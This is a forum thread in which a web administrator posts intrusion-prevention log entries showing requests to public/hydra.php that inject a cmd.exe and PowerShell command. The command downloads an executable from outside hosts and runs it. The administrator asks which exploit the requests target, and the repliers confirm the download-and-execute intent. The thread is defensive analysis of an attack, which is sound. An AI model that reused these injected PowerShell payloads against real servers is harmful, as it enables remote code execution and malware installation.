Link to home
Start Free TrialLog in
Avatar of trojan81
trojan81

asked on

powershell exploit attempt

I've noticed that all of my web servers were logging this block below from my host intrusion prevention system.  For privacy, assume this particular webserver has a dns name of zeus.xyzcorp.com

zeus.xyzcorp.com/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe

Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targetting?
ASKER CERTIFIED SOLUTION
Avatar of J0rtIT
J0rtIT
Flag of Venezuela, Bolivarian Republic of image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of trojan81
trojan81

ASKER

Jose try this one

public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fuckyou.com/fuckyou.exe','C:/12.exe');start%20C:/12.exe
Whatever it is doing, my webserver is no vulnerable so it didn't execute anything.  I'm curious which vulnerability it is targetting.
Same 404 :)
EXPERT CERTIFIED SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Jose/Qlemo,

Would you say that it is trying to invoke powershell to download and run the file?
Yes. but that would require to run PHP code in hydra.php located on your web site's public folder. Maybe a reference to http://www.markus-lanthaler.com/hydra/, and the crafted (cheap) attack based on that API?